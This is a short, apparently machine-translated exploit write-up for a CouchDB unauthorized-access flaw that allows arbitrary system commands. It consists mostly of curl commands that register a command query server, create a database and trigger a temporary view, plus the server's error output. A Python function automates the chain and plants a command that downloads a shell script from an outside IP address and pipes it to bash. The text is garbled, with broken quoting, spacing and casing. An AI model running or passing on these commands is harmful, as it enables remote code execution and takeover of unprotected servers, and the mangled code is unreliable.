[email protected]:~# curl-x PUT ' http://3d9da15e7acfd5730.jie.sangebaimao.com/_config/query_servers/cmd '-d ' " /sbin/ifconfig>/tmp/6666 "'" [email protected]:~# curl-x PUT ' http://3d9da15e7acfd5730.jie.sangebaimao.com /vultest ' {"OK": true}[email protected]:~# curl-x PUT ' http://3d9da15e7acfd5730.jie.sangebaimao.com/vultest/ Vul '-d ' {"_id": "770895a97726d5ca6d70a22173005c7b"} ' {"OK": true, "id": "Vul", "Rev": " 1-967a00dff5e02add41819138abb3284d "}[email protected]:~# curl-x POST"/http// 3d9da15e7acfd5730.jie.sangebaimao.com/vultest/_temp_view?limit=11 '-d ' {"Language": "cmd", "Map": ""} '-H ' Content-type:application/json ' {"error": "EXIT", "Reason": "{{badmatch,{error,{bad_return_value,{os_process_error, {exit_status,0}}}}},\n [{couch_query_servers,new_process,3,\n [{file,\ ' couch_query_servers.erl\ '},{l ine,477}]},\n {couch_query_servers,lang_proc,3,\n [{file,\ "couch_query_servers.erl\"},{line,462}]}, \ n {couch_query_servers,handle_call,3,\n [{file,\ "couch_query_servers.erl\"},{line,334}]},\n {gen_server,handle_msg,5,[{file,\ "Gen_se Rver.erl\ "},{line,585}]},\n {proc_lib,init_p_do_apply,3,[{file,\" proc_lib.erl\ "},{line,239}]}]}"}[email protected]:~#
PY:
defCouchDb (URL):PrintURL cmd='curl-x PUT \ ''+url +'/_config/query_servers/cmd\ ''+'- D'+'\ ' "/usr/bin/curl http://192.184.40.86:6554/1.sh|bash>/tmp/6666" \ ''cmd1='curl-x PUT \ ''+url +'/vultest\ ''CMD2='curl-x PUT \ ''+url +'/vultest/vul\ ''+'- D'+'\ ' {"_id": "770895a97726d5ca6d70a22173005c7b"}\ ''cmd3='curl-x POST \ ''+url +'/vultest/_temp_view?limit=11\ ''+'- D'+'\ ' {"Language": "cmd", "Map": "}\ "'+'- H' '\ ' content-type:application/json\ '' #Print Cmd3Step1 =os.system (cmd) step2=Os.system (cmd1) step3=Os.system (CMD2) SETP4=Os.system (CMD3)Pass
Reference:
http://drops.wooyun.org/papers/16030
COUCHDB unauthorized access vulnerability execution arbitrary system command EXP